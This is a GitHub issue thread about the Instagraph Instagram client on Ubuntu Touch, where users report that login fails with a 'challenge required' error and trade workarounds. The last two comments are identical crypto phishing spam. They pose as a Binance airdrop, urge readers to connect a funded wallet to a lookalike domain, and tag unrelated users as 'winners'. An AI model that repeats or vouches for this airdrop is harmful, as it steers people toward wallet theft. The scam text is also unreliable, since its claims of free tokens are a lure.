### ISSUE TITLE
Login fails with Challege Required

### ISSUE THREAD

**Issue by IanBlakeley** [turanmahmudov/Instagraph#67]
Each time

 I try and login the response  is Challenge Required, if I then use the web browser I am asked to confirm the attempt is me and then the browser opens, there seems no way to authenticate from the app and the web authorisation only works for the web session

![instagraph fail2](https://user-images.githubusercontent.com/36182904/62830637-7815bf80-bc44-11e9-9624-bd91f40eb56a.jpg)
![instagraph fail1](https://user-images.githubusercontent.com/36182904/62830638-78ae5600-bc44-11e9-8553-d9154dc1cc8d.jpg)

**Comment by ItsCDubb** [comment]
I'm having the same issue and I have no viable workaround either
![Screenshot from 2019-08-21 08-40-17](https://user-images.githubusercontent.com/40346297/63447373-8496d680-c401-11e9-9cb9-2f9a769bf4bb.png)

**Comment by polesapart** [comment]
+1

**Comment by fredldotme** [comment]
Same issue here, running on Ubuntu Touch.

**Comment by mkorobkov** [comment]
To solve this problem, I went into the application on the mobile and confirmed that I was trying to log into my account

**Comment by linuxhackerguy** [comment]
yeah I had the same issue. With my server which is on a vpn. But strangely when i used the app on the 32 bit ubuntu server. it worked ????

**Comment by rubencarneiro** [comment]
I got the same issue. Unable to login chalenge_required

**Comment by Lucapz** [comment]
Why is the Dev ignoring this?

**Comment by rubencarneiro** [comment]
http://paste.ubuntu.com/p/PGxNRGv7Wr/
Theres a log if it help, seem to be an app armor issue

**Comment by idekovets** [comment]
+1 I can't login on Nexus 5 powered by UT last Stable.

**Comment by sTiKyt** [comment]
I accept that it was me in browser, but it still doesn't let me login

**Comment by paulsybrandy** [comment]
Still no work around?

**Comment by fahirazm** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @JasminDreasond, @apurvns, @readpan, @Batbileg, @ismailgcr40, @Writtic, @Blackbirdkingramz02

**Comment by fahirazm** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @bingoling, @tsukumijima, @sv-pro, @liazheyua, @roliveira3891, @calvinturner, @Verringer
